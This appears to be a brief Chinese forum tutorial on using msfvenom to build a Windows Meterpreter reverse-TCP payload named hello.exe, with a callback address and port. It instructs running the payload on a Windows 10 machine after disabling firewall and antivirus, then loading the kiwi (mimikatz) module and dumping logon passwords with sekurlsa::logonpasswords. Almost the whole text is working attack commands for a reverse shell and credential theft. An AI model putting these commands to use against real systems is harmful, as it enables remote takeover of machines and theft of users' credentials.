msfvenom 生成被控端,并载入mimikaze
生成被控端hello.exemsfvenom-p windows/x64/meterpreter/reverse_tcp lhost=192.168.64.146 lport=22222-f exe -o /home/kali/Desktop/hello.exe
开始监听:
把被控端移动到windows10系统下,关闭防火墙和杀毒后,运行,即可得到meterpreter
执行命令 load -l ,查看可载入模块。
载入 load kiwi
执行:kiwi_cmd privilege::debug
执行:kiwi_cmd sekurlsa::logonpasswords
页:
[1]